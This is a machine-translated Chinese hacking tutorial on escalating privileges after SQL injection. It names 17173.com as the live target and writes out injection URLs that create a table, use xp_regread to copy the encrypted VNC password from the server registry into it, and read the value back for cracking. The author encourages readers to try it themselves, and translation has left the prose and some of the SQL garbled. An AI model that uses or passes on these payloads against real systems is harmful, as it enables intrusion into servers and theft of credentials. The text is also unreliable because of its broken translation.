17173 Some tips for promoting permissions after investment injection
Producer: Ding Lin
QQ: 109295766
website:
Www.22tian.com
-------------------------------------------------- -----------------------------
Now the website injection is the most popular website invasion technology today, and the major websites in China also have injected, perhaps these
There is no loopholes in the website, and no one can detect them! Don't think about the designer of the well-known sites.
Ample, !!!!
I haven't done a tutorial for a long time. Today, I will talk about how to continue to detect these websites after the injection point.
Many friends get an injection point on the website, can't guess the password / query is not in the background, and look at the DB_OWNER role.
Han ~~~~~~~~ Most of them are here to die.
In fact, I will undergo a well-known website in China, and the world is ranked. 17173 as an example.
Get server authority. (Only instructions, do not exercise, interested can test yourself) Because I am afraid that the police uncle caught ~~~~~~~~~~~`
It is best not afraid to test, it's just like I am as small as it is !!!!!!!!!! 1
1, find the injection point
How to find the injection point has some more articles yourself to find
I have found that the address is http://news.17173.com/m_false.asp?newsid=70739
1 = 1 correct 1 = 2 error, explain the existence of injection
2, then use NBSI to detect my NBSI, because I haven't played it for a long time.
That only DB_OWNER permission,
I will no longer demonstrate it next, everyone will look down.
3, scanning the port of the website server to get the host open service, () ourselves
4, we assume that there is a VNC service VNC corresponding port number 5900 (actually what service is open to see yourself)
We create a table named DING on the server and add a type of char, field name DLIN.
(Data Type UniqueIdentifier, is used to store a 16-byte long binary data type)
Then add data to the table:
Http://news.17173.com/m_false.asp?newsid=70739;create Table [DBO]. [DING] ([DLIN] [UNIQUEIDENTINTIER]);
Everyone see here
This is a table created before the tutorial.
Then add data to the table
http://news.17173.com/m_false.asp?newsid=70739;DECLARE @result uniqueidentifier EXEC master.dbo.xp_regread HKEY_CURRENT_USER, Software / ORL / WinVNC3, Password, @result output insert into ding (dlin) values (@ Result; -
The above command means that the VNC reads the value of the encrypted password of the registry from the registry, and then insert this value into the DING table just built.
In this way, the encrypted password of the registry:
Let's see the result
Http://news.17173.com/; And (Select Count (*) from ding where dlin> 1
As a result, we can see the encrypted VNC password, and then use the tool to run the password. What do you want to do next???
Of course, this is just an example. If the server does not open VNC, other services are the same. Everyone can change it slightly to change the above statement.
Well, I will talk so much today!
Welcome everyone to join Yun Tian network group for technical exchange, group number: 778618
Don't worry about me, I am afraid! So there is a little prompt, don't come true, if your courage is big enough, then you can try it.
